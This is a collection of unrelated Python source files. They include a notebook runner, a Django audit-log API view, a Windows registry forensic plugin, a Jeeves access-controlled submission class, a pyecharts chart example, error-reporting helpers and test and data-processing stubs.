logging.getLogger().setLevel(logging.getLevelName(self.args.log_level))
logging.debug('Enabled {} logging level'.format(self.args.log_level))
if self.args.import_ipynb:
check_isfile(self.args.import_ipynb)
logging.info('Loading Jupyter notebook {}'.format(self.args.import_ipynb))
self.nb = nbf.read(self.args.import_ipynb, as_version=4)
uid = self.args.import_ipynb
else:
uid = self.load_cells_params()
logging.debug("Unique id: '{}'".format(uid))
logging.info('Disable cache: {}'.format(self.args.disable_cache))
logging.info('Ignore cache: {}'.format(self.args.ignore_cache))
if self.args.export_pynb and not self.args.no_exec:
fatal('--export-pynb requires --no-exec')
if self.args.kernel:
self.set_kernel(self.args.kernel)
self.process(uid=uid,
add_footer=not self.args.disable_footer,
no_exec=self.args.no_exec,
disable_cache=self.args.disable_cache,
ignore_cache=self.args.ignore_cache)
if self.args.export_html:
self.export_html(self.args.export_html)
if self.args.export_ipynb:
self.export_ipynb(self.args.export_ipynb)
if self.args.export_pynb:
self.export_pynb(self.args.export_pynb)
def main():
"""
Entry point for pynb command
:return:
"""
nb = Notebook()
nb.run()
if __name__ == "__main__":
main()
|
1691351
|
from django.shortcuts import render
from rest_framework.views import APIView
from rest_framework.response import Response
from django.db.models import Q
from user.permissions import CustomerPremission
from rest_framework.permissions import IsAuthenticated, IsAdminUser, IsAuthenticatedOrReadOnly, AllowAny
import time,datetime
from easyaudit.models import *
from easyaudit.serializers import *
from user.models import *
class CRUDEventViewSet(APIView):
"""
获取系统操作日志
"""
# 权限相关
permission_classes = [CustomerPremission,IsAuthenticated]
module_perms = ['easyaudit:crudevent']
def post(self,request,format=None):
results = []
timerange = request.data['timerange'] if 'timerange' in request.data else None
username = request.data['username'] if 'username' in request.data else None
laste_time = (datetime.date.today() - datetime.timedelta(days=7)).strftime('%Y-%m-%d %X')
# 默认显示最近7天内的日志
if (timerange is None) and (username is None):
laste_logs = CRUDEvent.objects.filter(Q(datetime__gt=laste_time),Q(user__isnull=False),~Q(changed_fields__icontains='jwt_secret')).order_by('-id')
for log in laste_logs:
log_serializer = CRUDEventSerializer(log)
results.append(log_serializer.data)
elif (timerange and (username is None)):
date_from = timerange[0]
date_to = timerange[1]
search_logs = CRUDEvent.objects.filter(Q(datetime__range=(date_from,date_to)),Q(user__isnull=False),~Q(changed_fields__icontains='jwt_secret')).order_by('-id')
for log in search_logs:
log_serializer = CRUDEventSerializer(log)
results.append(log_serializer.data)
elif (username):
user_ids = Users.objects.filter(Q(username__contains=username)).values('id')
user_id_list = []
for user_id in user_ids:
user_id_list.append(user_id['id'])
if (timerange):
date_from = timerange[0]
date_to = timerange[1]
search_logs = CRUDEvent.objects.filter(Q(datetime__range=(date_from,date_to)),Q(user_pk_as_string__in=user_id_list),~Q(changed_fields__icontains='jwt_secret')).order_by('-id')
for log in search_logs:
log_serializer = CRUDEventSerializer(log)
results.append(log_serializer.data)
else:
laste_logs = CRUDEvent.objects.filter(Q(datetime__gt=laste_time),Q(user_pk_as_string__in=user_id_list),~Q(changed_fields__icontains='jwt_secret')).order_by('-id')
for log in laste_logs:
log_serializer = CRUDEventSerializer(log)
results.append(log_serializer.data)
re = { 'results': '',}
re['results'] = results
return Response(re)
|
1691355
|
import logging
from construct import Int64ul
from regipy.exceptions import RegistryKeyNotFoundException
from regipy.hive_types import SYSTEM_HIVE_TYPE
from regipy.plugins.plugin import Plugin
from regipy.utils import convert_wintime
logger = logging.getLogger(__name__)
BAM_PATH = r'Services\bam\UserSettings'
class BAMPlugin(Plugin):
NAME = 'background_activity_moderator'
DESCRIPTION = 'Get the computer name'
COMPATIBLE_HIVE = SYSTEM_HIVE_TYPE
def run(self):
logger.info('Started Computer Name Plugin...')
try:
for subkey_path in self.registry_hive.get_control_sets(BAM_PATH):
subkey = self.registry_hive.get_key(subkey_path)
for sid_subkey in subkey.iter_subkeys():
sid = sid_subkey.name
logger.info(f'Parsing BAM for {sid}')
sequence_number = None
version = None
entries = []
for value in sid_subkey.get_values():
if value.name == 'SequenceNumber':
sequence_number = value.value
elif value.name == 'Version':
version = value.value
else:
entries.append({
'executable': value.name,
'timestamp': convert_wintime(Int64ul.parse(value.value), as_json=self.as_json)
})
self.entries.extend([
{
'sequence_number': sequence_number,
'version': version,
'sid': sid,
**x
} for x in entries]
)
except RegistryKeyNotFoundException as ex:
logger.error(ex)
|
1691378
|
from datetime import *
import sys
sys.path.append("../../..")
import JeevesLib
from smt.Z3 import *
import macropy.activate
from users import *
from assignment import *
class Submission():
def __init__(self, submissionId, title, assignmentId, submitterId, fileRef):
self.submissionId = submissionId
self.title = title
self.assignmentId = assignmentId
self.submitterId = submitterId
self.fileRef = fileRef
self.submittedOn = ""
self.grade = None
self.submittedOn = datetime.now()
JeevesLib.init()
## Policies ##
def _isUser(context):
return isinstance(context, User)
def _isSubmitter(context):
return context.userId == self.submitterId
def _isInstructor(context):
return isinstance(context, Instructor)
## Labels ##
self._viewerL = JeevesLib.mkLabel()
self._editorL = JeevesLib.mkLabel()
self._adminL = JeevesLib.mkLabel()
## Restrict Labels ##
JeevesLib.restrict(self._viewerL, lambda oc: JeevesLib.jor(lambda :_isSubmitter(oc), lambda : _isInstructor(oc) ) )
JeevesLib.restrict(self._editorL, lambda oc: _isSubmitter(oc) )
JeevesLib.restrict(self._adminL, lambda oc: _isInstructor(oc) )
## Getter, Setters, and Show-ers ##
#Grade
def getGrade(self):
score = JeevesLib.mkSensitive(_viewerL, self.grade, -1)
return score
def setGrade(self,score):
# Would it be better to store score as a concretized value?
# It wouldn't work as well for a database, but possibly in simple examples
self.grade = score
def showGrade(self, context):
faceted_value = self.getGrade()
return JeevesLib.concretize(context, faceted_value)
#Submission Details (fileRef)
def getSubmissionDetails(self):
details = JeevesLib.mkSensitive(self._viewerL, self.fileRef, "N/A")
return details
def setSubmissionDetails(self, text):
self.fileRef = text
def showSubmissionDetails(self, context):
return JeevesLib.concretize(context, self.getSubmissionDetails())
#Submission Title
def getTitle(self):
details = JeevesLib.mkSensitive(self._viewerL, self.title, "N/A")
return details
def setTitle(self, title):
self.title = title
def showTitle(self, context):
return JeevesLib.concretize(context, self.getTitle())
## Magic Methods ##
def __repr__(self):
#Is there a way to integrate contexts with representation?
#Would there be a point?
return "Submisison(%d, %s, %s)" % (self.submissionId, self.title, self.fileRef)
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.submissionId == other.submissionId and self.title == other.title
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
|
1691428
|
from pyecharts import options as opts
from pyecharts.charts import EffectScatter
from pyecharts.faker import Faker
c = (
EffectScatter()
.add_xaxis(Faker.choose())
.add_yaxis("", Faker.values())
.set_global_opts(
title_opts=opts.TitleOpts(title="EffectScatter-显示分割线"),
xaxis_opts=opts.AxisOpts(splitline_opts=opts.SplitLineOpts(is_show=True)),
yaxis_opts=opts.AxisOpts(splitline_opts=opts.SplitLineOpts(is_show=True)),
)
.render("effectscatter_splitline.html")
)
|
1691430
|
from .token import coord
from termcolor import colored as X
import os.path
import sys
def show_line(pos, hi=lambda x: X(x, 'red', attrs=['bold'])):
if not pos.file:
return
if not os.path.isfile(pos.file):
return
with open(pos.file) as tmp:
for num, line in enumerate(tmp):
if num + 1 == pos.line:
print(line, end='')
print(' ' * (pos.col - 1), hi('^'), hi('~' * (pos.len - 1)), sep='')
break
def abort(fmt, *args, pos=coord()):
err = X('error', 'red')
print('{}: {!s}{}'.format(err, pos, fmt.format(*args)))
show_line(pos)
sys.exit(1)
def warn(fmt, *args, pos=coord()):
err = X('warning', 'blue')
print('{}: {!s}{}'.format(err, pos, fmt.format(*args)))
show_line(pos, hi=lambda x: X(x, 'blue', attrs=['bold']))
def hint(fmt, *args, pos=coord()):
err = X('hint', 'green')
print('{}: {!s}{}'.format(err, pos, fmt.format(*args)))
show_line(pos, hi=lambda x: X(x, 'green', attrs=['bold']))
def panic(fmt, *args, pos=coord()):
raise Exception('{!s}{}'.format(pos, fmt.format(*args)))
|
1691437
|
from tests.utils import W3CTestCase
class TestBidiOverride(W3CTestCase):
vars().update(W3CTestCase.find_tests(__file__, 'bidi-override-'))
|
1691475
|
from .processors import InputExample, InputFeatures, DataProcessor
from .processors import glue_output_modes, glue_processors, glue_tasks_num_labels, glue_convert_examples_to_features
from .processors import xnli_output_modes, xnli_processors, xnli_tasks_num_labels
from .metrics import is_sklearn_available
if is_sklearn_available():
from .metrics import glue_compute_metrics, xnli_compute_metrics
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.